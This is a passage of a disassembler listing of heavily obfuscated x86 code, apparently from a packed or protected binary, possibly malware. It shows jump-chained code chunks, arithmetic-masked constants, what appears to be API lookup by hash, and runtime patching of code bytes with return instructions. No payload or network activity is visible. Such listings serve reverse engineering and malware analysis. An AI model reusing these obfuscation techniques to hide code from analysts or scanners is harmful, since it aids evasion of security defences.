		xor	edx, esi
		jmp	loc_443463
; END OF FUNCTION CHUNK	FOR sub_43F13A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_44F418:				; CODE XREF: sub_440C05:loc_446AFBj
		rol	ecx, 15h
		push	offset sub_43F953
		jmp	loc_43CE08
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4501A9

loc_44F425:				; CODE XREF: sub_4501A9+7j
		or	ebx, 480C490Dh
		xor	ebx, 14648B93h
		or	ebx, 0CFD0A787h
		add	ebx, 6A3821h
		xchg	ebx, [esp+0]
		jmp	sub_44E417
; END OF FUNCTION CHUNK	FOR sub_4501A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_44F445:				; CODE XREF: sub_4408AE+17413j
		xor	eax, 0F42461B8h
		or	edx, 22D92E68h

loc_44F451:				; CODE XREF: sub_4408AE:loc_457CB8j
		or	edi, 520ACC44h
		add	edi, 21155E18h
		xchg	edi, [esp+0]
		jmp	sub_4525FC
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_445162
		jmp	loc_45A818
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_44F472:				; CODE XREF: sub_454789:loc_4408E2j
					; sub_44ABA3-9499j
		jz	loc_45764C
		jmp	loc_455ECB
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------

loc_44F47D:				; CODE XREF: hvvrg7ie:0044B004j
		jz	loc_446DC1
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_44F483:				; CODE XREF: sub_44B1C6:loc_4573EDj
		popf
		jle	loc_446DA8
		pop	eax
		mov	edx, [eax]
		jmp	loc_4471DD
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_44F492:				; CODE XREF: sub_4466CE:loc_444967j
		mov	edx, eax
		call	sub_458F7F

loc_44F499:				; CODE XREF: hvvrg7ie:004471E2j
		jmp	loc_441C81
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C8E0

loc_44F49E:				; CODE XREF: sub_43C8E0+Dj
		jmp	loc_4457A6
; END OF FUNCTION CHUNK	FOR sub_43C8E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDCF

loc_44F4A3:				; CODE XREF: sub_43BDCF+Dj
		jmp	loc_443B25
; END OF FUNCTION CHUNK	FOR sub_43BDCF
; ---------------------------------------------------------------------------

loc_44F4A8:				; CODE XREF: hvvrg7ie:0045B9B6j
		jno	loc_459767

; =============== S U B	R O U T	I N E =======================================



sub_44F4AE	proc near		; CODE XREF: sub_45038B-FACBp

; FUNCTION CHUNK AT 0044B484 SIZE 00000015 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	ebx, 0CB84EFE3h
		sub	eax, ebx
		pop	ebx
		jmp	loc_44B484
sub_44F4AE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529EA

loc_44F4C0:				; CODE XREF: sub_4529EA+74F5j
		lea	eax, [ebp-125h]
		mov	[ebp-20h], eax

loc_44F4C9:				; CODE XREF: sub_45AF0A-6474j
		mov	eax, [ebp-1Ch]
		cmp	byte ptr [eax],	0
		jmp	loc_440EAD
; END OF FUNCTION CHUNK	FOR sub_4529EA

; =============== S U B	R O U T	I N E =======================================



sub_44F4D4	proc near		; CODE XREF: sub_4408FA-83p
					; hvvrg7ie:0044B3BAj

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043B2A1 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00447361 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B1E5 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004591BD SIZE 00000006 BYTES

		xchg	esi, [esp+8+var_8]
		pop	esi
		push	79C40E70h
		pop	ecx
		rol	ecx, 2
		jb	loc_43B2A1
		or	ecx, 0A8E4C91Ah
		test	esi, 6F18EB89h
		jmp	loc_4591BD
sub_44F4D4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44F4F8:				; CODE XREF: hvvrg7ie:loc_450795j
		xchg	edi, ebp

; =============== S U B	R O U T	I N E =======================================



sub_44F4FA	proc near		; CODE XREF: sub_4585BB-9FDBp

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		mov	ebp, edi
		pop	edi
		jmp	loc_456838
sub_44F4FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44F509:				; CODE XREF: sub_43F227+BF9Aj
		mov	eax, 83ED7AACh
		call	sub_450C5A
		mov	ds:dword_41D0DC, eax
		lea	eax, nullsub_11
		mov	byte ptr [eax],	0C3h
		jmp	loc_44FF28
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		jmp	loc_45A423
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_44F532:				; CODE XREF: sub_444B29:loc_44EA04j
		or	ebp, 4CF38E86h
		jmp	loc_43E364
; END OF FUNCTION CHUNK	FOR sub_444B29
; ---------------------------------------------------------------------------
		sub	edi, 0EBE3D367h
		jmp	sub_4523D3

; =============== S U B	R O U T	I N E =======================================



sub_44F548	proc near		; CODE XREF: hvvrg7ie:004414A4j
					; hvvrg7ie:004424A0j ...

; FUNCTION CHUNK AT 00456070 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	eax, esi
		push	offset loc_43FE7E
		jmp	loc_456070
sub_44F548	endp

; ---------------------------------------------------------------------------

loc_44F558:				; CODE XREF: hvvrg7ie:loc_448AA7j
		call	sub_4562DC
		push	30CD0488h
		pop	eax
		rol	eax, 5
		jmp	loc_43A971
; ---------------------------------------------------------------------------
		popf
		sbb	ecx, 34006120h
		jmp	sub_43E484
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AE2

loc_44F577:				; CODE XREF: sub_443AE2:loc_45329Aj
		push	offset loc_4474C3
		jmp	loc_442858
; END OF FUNCTION CHUNK	FOR sub_443AE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443C1D

loc_44F581:				; CODE XREF: sub_443C1D:loc_443C27j
		or	edx, 70FF9D08h
		add	edx, 8B448F2Fh
		xchg	edx, [esp+0]
		jmp	sub_455751
; END OF FUNCTION CHUNK	FOR sub_443C1D
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_450F46
		jmp	loc_450E95
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_44F5A2:				; CODE XREF: sub_44C2EA+BAE6j
		jb	loc_44511E

loc_44F5A8:				; CODE XREF: sub_44C2EA:loc_454354j
		push	esi
		push	0E4412820h
		pop	esi
		sub	esi, ds:4000F6h

loc_44F5B5:				; CODE XREF: hvvrg7ie:loc_4471C4j
		and	esi, 0F3F4A3BDh
		or	esi, 0D73E5055h
		jmp	loc_439E3E
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------

loc_44F5C6:				; CODE XREF: hvvrg7ie:00442F7Ej
		jnz	loc_43C2EE
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44F5CC:				; CODE XREF: sub_44191F:loc_4570CEj
		add	edx, 6489F3D4h
		xor	edx, 8015DA77h
		add	edx, 32E8419Ch
		jmp	loc_444777
; END OF FUNCTION CHUNK	FOR sub_44191F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C132

loc_44F5E4:				; CODE XREF: sub_44C132-127E4j
		jmp	nullsub_522
; END OF FUNCTION CHUNK	FOR sub_44C132
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F53

loc_44F5E9:				; CODE XREF: sub_458F53:loc_45A813j
		add	eax, 7D99F9A8h
		xor	eax, 0A107F701h
		call	sub_450C5A
		mov	ds:off_41D160, eax
		lea	eax, loc_446D27
		mov	byte ptr [eax],	0C3h
		jmp	loc_454A21
; END OF FUNCTION CHUNK	FOR sub_458F53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44F60E:				; CODE XREF: sub_454099:loc_44BF7Ej
		cmp	edx, 1C6ACEB3h
		jmp	loc_4596C9
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
		push	edi
		push	3E97AD12h
		pop	edi
		rol	edi, 0Fh
		xor	edi, 0D5F025F5h
		test	edi, 10000h
		jmp	loc_442FFB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_44F634:				; CODE XREF: sub_457A97:loc_44C614j
		xchg	ebx, [esp-4+arg_0]
		mov	edx, ebx
		pop	ebx
		lea	eax, loc_451067
		call	sub_457A97

loc_44F645:				; CODE XREF: sub_4599EC+12j
		jmp	loc_4463CE
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------

loc_44F64A:				; CODE XREF: hvvrg7ie:00452483j
		jmp	loc_451275
; ---------------------------------------------------------------------------
		sbb	esi, 0DDEE7767h
		jmp	loc_45444B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_56. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_44F65B:				; CODE XREF: sub_4544DD+6989j
		jmp	loc_444EB4
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB9D

loc_44F660:				; CODE XREF: sub_45AB9D+Cj
		jmp	loc_456DC3
; END OF FUNCTION CHUNK	FOR sub_45AB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44F665:				; CODE XREF: sub_45889B-18A15j
		jmp	loc_44D884
; END OF FUNCTION CHUNK	FOR sub_45889B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44F66B	proc near		; CODE XREF: hvvrg7ie:0043BC29p
					; sub_44A87E-CDB5p ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044054F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044ABFB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044C06C SIZE 00000005 BYTES

		push	ebp
		call	sub_448C46

loc_44F671:				; CODE XREF: hvvrg7ie:0045590Cj
		rol	ecx, 8
		or	ecx, 0EE9C4604h
		add	ecx, ds:4000F0h
		rol	ecx, 1Eh
		xor	ecx, 844D717Ah
		add	eax, ecx
		jmp	loc_44054F
sub_44F66B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ACF1

loc_44F690:				; CODE XREF: sub_45ACF1:loc_449A17j
		xchg	edx, [esp+0]
		push	edx
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+4+var_4]
		push	ebx
		jmp	loc_4580E9
; END OF FUNCTION CHUNK	FOR sub_45ACF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0C0

loc_44F6A0:				; CODE XREF: sub_44E0C0:loc_43BA89j
		mov	ds:dword_45386C, eax
		call	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_44E0C0
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_44F6AA:				; CODE XREF: sub_4408AE:loc_45718Ej
		mov	edx, 0A2CD59D9h
		call	sub_445616
		push	offset loc_445610
		jmp	loc_44D7BB
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_44F6BE:				; CODE XREF: sub_4447AC:loc_43A3FFj
					; hvvrg7ie:0043A410j ...
		xor	esi, 2926925Eh
		or	esi, 0F3CDB840h
		rol	esi, 1Eh
		add	esi, 4144FFE0h
		xchg	esi, [esp+0]
		jmp	sub_45329F
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_44F6DB:				; CODE XREF: sub_44CEC8+ABC4j
		push	eax

loc_44F6DC:				; CODE XREF: sub_4484B9:loc_4567E3j
		mov	eax, [ebp+var_8]
		push	ecx
		mov	ecx, eax
		jmp	loc_43D664
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
		shr	ecx, 0Ch
		jmp	loc_4544A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445934

loc_44F6EF:				; CODE XREF: sub_445934-A3A5j
		jnp	loc_44DB4B
		push	5A0B4A81h
		jle	loc_4479CB

loc_44F700:				; CODE XREF: sub_445934:loc_43B5CBj
		or	eax, 12140016h
		add	eax, 4E0669F5h
		mov	eax, [eax]
		or	eax, eax
		jmp	loc_443242
; END OF FUNCTION CHUNK	FOR sub_445934
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B35B

loc_44F715:				; CODE XREF: sub_43B35B+6j
		push	offset sub_4544DD
		jmp	loc_43A96C
; END OF FUNCTION CHUNK	FOR sub_43B35B
; ---------------------------------------------------------------------------

loc_44F71F:				; CODE XREF: hvvrg7ie:loc_44CAD0j
		jz	loc_450C47
		jmp	loc_454490
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44F72A:				; CODE XREF: sub_45889B-8660j
		test	ebp, eax
		jmp	loc_43E32A
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_44F731:				; CODE XREF: hvvrg7ie:loc_449FF9j
		jnz	loc_43C063
		jmp	loc_44D9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44F73C:				; CODE XREF: sub_450434-1982j
		test	eax, 100000h
		jmp	loc_44E5E5
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_44F747:				; CODE XREF: hvvrg7ie:loc_45A998j
		add	ebx, 0FFC27755h
		xchg	ebx, [esp]
		jmp	loc_452E39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_44F755:				; CODE XREF: sub_456CD4-1AAC1j
		call	sub_44C33E
; END OF FUNCTION CHUNK	FOR sub_456CD4
; START	OF FUNCTION CHUNK FOR sub_439717

loc_44F75A:				; CODE XREF: sub_439717+D9Dj
					; sub_439717:loc_43CA9Aj
		call	sub_43DBDD
; END OF FUNCTION CHUNK	FOR sub_439717
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44F75F:				; CODE XREF: sub_44D2F8-1163Fj
		jmp	nullsub_115
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_44F764:				; CODE XREF: hvvrg7ie:loc_44A832j
		jnz	loc_44EE13
		jmp	loc_450975
; ---------------------------------------------------------------------------
		test	ebx, ecx
		jmp	loc_43AEDD

; =============== S U B	R O U T	I N E =======================================



sub_44F776	proc near		; CODE XREF: sub_43FA98:loc_447606p
					; hvvrg7ie:00455A70j
		xchg	ecx, [esp+0]
		pop	ecx
		push	esi
		push	ebp
		pop	esi
		xchg	esi, [esp+0]
		jmp	loc_45B54A
sub_44F776	endp

; ---------------------------------------------------------------------------
		rol	ebp, 14h
		add	ebp, 528BC4D3h
		jmp	sub_452C40

; =============== S U B	R O U T	I N E =======================================



sub_44F793	proc near		; CODE XREF: hvvrg7ie:00442CFCp
					; hvvrg7ie:00454E07j

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		add	edi, 94B18A0Ah
		xchg	edi, [esp-4+arg_0]
		jmp	sub_451703
sub_44F793	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_44F7A5:				; CODE XREF: sub_451E1C:loc_444476j
		add	eax, 0B80A1EAAh
		mov	[edx], ebx
		jmp	loc_455345
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------

loc_44F7B2:				; CODE XREF: hvvrg7ie:0043D4B1j
		jg	loc_454F1F
		jnb	loc_44DC97
		jmp	sub_4517A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4418F0

loc_44F7C3:				; CODE XREF: sub_4418F0+147E1j
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4418F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439990

loc_44F7CA:				; CODE XREF: sub_439990+13C80j
		jmp	loc_45AD85
; END OF FUNCTION CHUNK	FOR sub_439990

; =============== S U B	R O U T	I N E =======================================



sub_44F7CF	proc near		; CODE XREF: hvvrg7ie:0043B023p
					; sub_447E56-C410p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004393D9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004399E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044384D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044A4BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F82D SIZE 00000016 BYTES

		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+4+var_4]
		jmp	loc_4393D9
sub_44F7CF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44F7DA:				; CODE XREF: sub_43B6A5+15E36j
		jno	loc_45901C
		adc	ebx, ecx

loc_44F7E2:				; CODE XREF: sub_43B6A5:loc_44E18Bj
		call	sub_44DE0A
		mov	edx, 0B242B436h
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+8+var_8]
		jmp	loc_44343A
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------

loc_44F7F7:				; CODE XREF: hvvrg7ie:00457C97j
		jo	loc_43C5AA

; =============== S U B	R O U T	I N E =======================================



sub_44F7FD	proc near		; CODE XREF: hvvrg7ie:0044A5A0p

; FUNCTION CHUNK AT 0044C629 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_450C5A
		mov	ds:dword_41D0C8, eax
		lea	eax, nullsub_10
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C629
sub_44F7FD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44F81A:				; CODE XREF: hvvrg7ie:0044A58Cj
		mov	eax, [esp]
		jmp	loc_456A07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44F822:				; CODE XREF: sub_43E60A+Cj
		jnz	loc_441FB6
		jmp	loc_44FCD3
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7CF

loc_44F82D:				; CODE XREF: sub_44F7CF:loc_44A4BFj
		sub	eax, 0DA9DF01Dh
		xor	eax, 0F3772AFAh
		push	offset loc_4456EA

loc_44F83E:				; CODE XREF: sub_44D47A:loc_45AC80j
		jmp	loc_4399E0
; END OF FUNCTION CHUNK	FOR sub_44F7CF
; ---------------------------------------------------------------------------

loc_44F843:				; CODE XREF: hvvrg7ie:loc_43DFF5j
		xor	ebx, 0CAA59E75h
		add	ebx, ebp
		add	ebx, 9AA18E32h
		mov	[ebx], eax
		jmp	loc_44FD16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4538F3

loc_44F858:				; CODE XREF: sub_4538F3:loc_451412j
		or	eax, eax
		jnz	loc_43D50F
		jmp	loc_455E03
; END OF FUNCTION CHUNK	FOR sub_4538F3
; ---------------------------------------------------------------------------

loc_44F865:				; CODE XREF: hvvrg7ie:0044893Aj
		sub	edi, 0DB6AFEFEh
		add	edi, 8FBF4EDAh
		xchg	edi, [esp]
		jmp	nullsub_22

; =============== S U B	R O U T	I N E =======================================



sub_44F879	proc near		; CODE XREF: sub_44048E+6p
					; hvvrg7ie:00441F9Fj

; FUNCTION CHUNK AT 00450461 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		or	eax, eax
		push	offset loc_43A37A
		jmp	loc_450461
sub_44F879	endp

; ---------------------------------------------------------------------------
		db 85h,	0F8h, 0E9h
		dd 0FFFFED34h, 57A68E0Fh, 0EE81FFFFh, 49BF6ED0h, 9DE7E9h
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_126. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_44F8A2:				; CODE XREF: sub_449CC8:loc_44FAB9j
		add	eax, ds:4000F4h
		and	eax, 0C8DBCF53h
		sub	eax, 1E449708h
		or	eax, 2CC0F448h
		xor	eax, 0B794DD2Ch
		add	eax, ebp
		jmp	loc_43AE9A
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4546E9

loc_44F8C7:				; CODE XREF: sub_4546E9-FC78j
		jz	loc_441C18
		jmp	loc_45AD37
; END OF FUNCTION CHUNK	FOR sub_4546E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440402

loc_44F8D2:				; CODE XREF: sub_440402:loc_44D499j
		cdq
		add	eax, [esp+8+var_8]
		jnz	loc_44FBA6
		adc	edx, [esp+8+var_4]
		add	esp, 8
		jmp	loc_4422C5
; END OF FUNCTION CHUNK	FOR sub_440402
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_44F8E8:				; CODE XREF: sub_446966+A009j
		jle	loc_43F149
		popf

loc_44F8EF:				; CODE XREF: sub_446966:loc_444B1Ej
		mov	eax, [ebp-4]
; END OF FUNCTION CHUNK	FOR sub_446966

; =============== S U B	R O U T	I N E =======================================



sub_44F8F2	proc near		; CODE XREF: sub_44170Fj

; FUNCTION CHUNK AT 0043AB62 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E892 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449C4D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B68E SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044D943 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00454AF0 SIZE 0000000B BYTES

		cmp	byte ptr [eax],	0F1h
		jmp	loc_43AB62
sub_44F8F2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C33E

loc_44F8FA:				; CODE XREF: sub_44C33E:loc_43EF55j
					; hvvrg7ie:0043EF62j
		sub	edx, 423A221Ch
		add	edx, 6AF34C46h
		push	offset sub_442301
		jmp	nullsub_485
; END OF FUNCTION CHUNK	FOR sub_44C33E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_44F910:				; CODE XREF: hvvrg7ie:00447A23j
					; sub_446EC2:loc_4480C9j
		xor	eax, 96FB45FCh

loc_44F916:				; CODE XREF: hvvrg7ie:loc_447A11j
		rol	ebx, 19h
		xor	ebx, 980C1F8Dh
		add	ebx, ebp
		jmp	loc_446BA5
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44F926:				; CODE XREF: sub_43F227+31D9j
					; hvvrg7ie:0044E9F6j
		shr	ebx, 0Ah
		jmp	loc_453434
; END OF FUNCTION CHUNK	FOR sub_43F227
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_437. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B07D

loc_44F92F:				; CODE XREF: sub_45B07D-5A52j
		cmp	ds:dword_44EE40[eax*4],	0
		jz	loc_45A262
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0CFh
		jz	loc_45A25B
		push	offset sub_44FB23
		jmp	loc_4527D2
; END OF FUNCTION CHUNK	FOR sub_45B07D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444AA3

loc_44F953:				; CODE XREF: sub_444AA3:loc_446B42j
		pop	esi
		and	esi, 0F2920E28h
		test	esi, 80000h
		jmp	loc_447E7B
; END OF FUNCTION CHUNK	FOR sub_444AA3
; ---------------------------------------------------------------------------
		cmp	ebx, 2356EE84h
		jmp	loc_45ADDA
; ---------------------------------------------------------------------------

loc_44F970:				; CODE XREF: hvvrg7ie:0044D4D3j
		jl	loc_450D67
; START	OF FUNCTION CHUNK FOR sub_449AD1

loc_44F976:				; CODE XREF: sub_449AD1:loc_44D4B7j
		add	esi, 4385C29Bh
		xchg	esi, [esp+4+var_4]
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_449AD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43931C

loc_44F984:				; CODE XREF: sub_43931C+54CEj
		jz	loc_4555D8
		jmp	loc_449910
; END OF FUNCTION CHUNK	FOR sub_43931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44F98F:				; CODE XREF: sub_440643+F577j
		js	loc_43C33D
		ror	ecx, 1Ah

loc_44F998:				; CODE XREF: hvvrg7ie:00454AC6j
		jp	loc_43DF24
		jmp	loc_4584BC
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44F9A3:				; CODE XREF: sub_442FD1+A7B3j
		push	esi
		push	0CD6AD7F8h
		pop	esi
		sub	esi, 2A8E8178h
		or	esi, 7711C3E2h
		add	esi, 0AD91ED79h
		rol	esi, 8
		push	offset sub_457F95
		jmp	loc_444962
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_44F9C9:				; CODE XREF: hvvrg7ie:00441B79j
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_44F9CA	proc near		; CODE XREF: hvvrg7ie:00455211p
		xchg	ebx, [esp+0]
		pop	ebx
		pop	ecx
		jmp	loc_4453D2
sub_44F9CA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_44F9D4:				; CODE XREF: sub_449CC8:loc_43DF56j
		pushf
		jz	sub_451958
		jmp	loc_452574
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B99

loc_44F9E0:				; CODE XREF: sub_446B99+1j
		test	ebx, edx
		jmp	loc_441C0A
; END OF FUNCTION CHUNK	FOR sub_446B99
; ---------------------------------------------------------------------------

loc_44F9E7:				; CODE XREF: hvvrg7ie:00443308j
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		push	edi
		jmp	loc_43F7FE
; ---------------------------------------------------------------------------
		shr	ebp, 0Fh
		jmp	sub_442B77
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F15

loc_44F9FB:				; CODE XREF: sub_442F15+1Ej
		jge	loc_455A51
; END OF FUNCTION CHUNK	FOR sub_442F15
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_44FA01:				; CODE XREF: sub_43EE33+193F2j
		jmp	loc_440681
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
		xchg	ecx, ebx
		and	esi, 81DA2768h
		jmp	loc_455A49
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44FA14:				; CODE XREF: hvvrg7ie:004542D2j
		jl	loc_439CE3
		push	ecx

loc_44FA1B:				; CODE XREF: hvvrg7ie:loc_43C337j
		or	ecx, 0A44B2B93h
		js	loc_453232
		shl	edx, 1Ah
		not	esi
		jmp	loc_43F808
; ---------------------------------------------------------------------------
		pop	ebx
		jmp	sub_43A7B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44FA37:				; CODE XREF: sub_453405-485Fj
		and	edi, 816A8562h

loc_44FA3D:				; CODE XREF: sub_453405:loc_44D102j
		push	edx
		call	sub_459B45

loc_44FA43:				; CODE XREF: hvvrg7ie:00453017j
		jmp	loc_442BC6
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_44FA48:				; CODE XREF: sub_450E01+Fj
		jmp	loc_4567BF
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------

loc_44FA4D:				; CODE XREF: hvvrg7ie:0044A25Ej
		jnp	loc_43AEA0
; START	OF FUNCTION CHUNK FOR sub_449D38

loc_44FA53:				; CODE XREF: sub_449D38:loc_44A247j
		call	sub_44E23D

loc_44FA58:				; CODE XREF: hvvrg7ie:00459310j
		jmp	loc_44A0CB
; END OF FUNCTION CHUNK	FOR sub_449D38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF7D

loc_44FA5D:				; CODE XREF: sub_44CF7D+Bj
		jmp	loc_450611
; END OF FUNCTION CHUNK	FOR sub_44CF7D
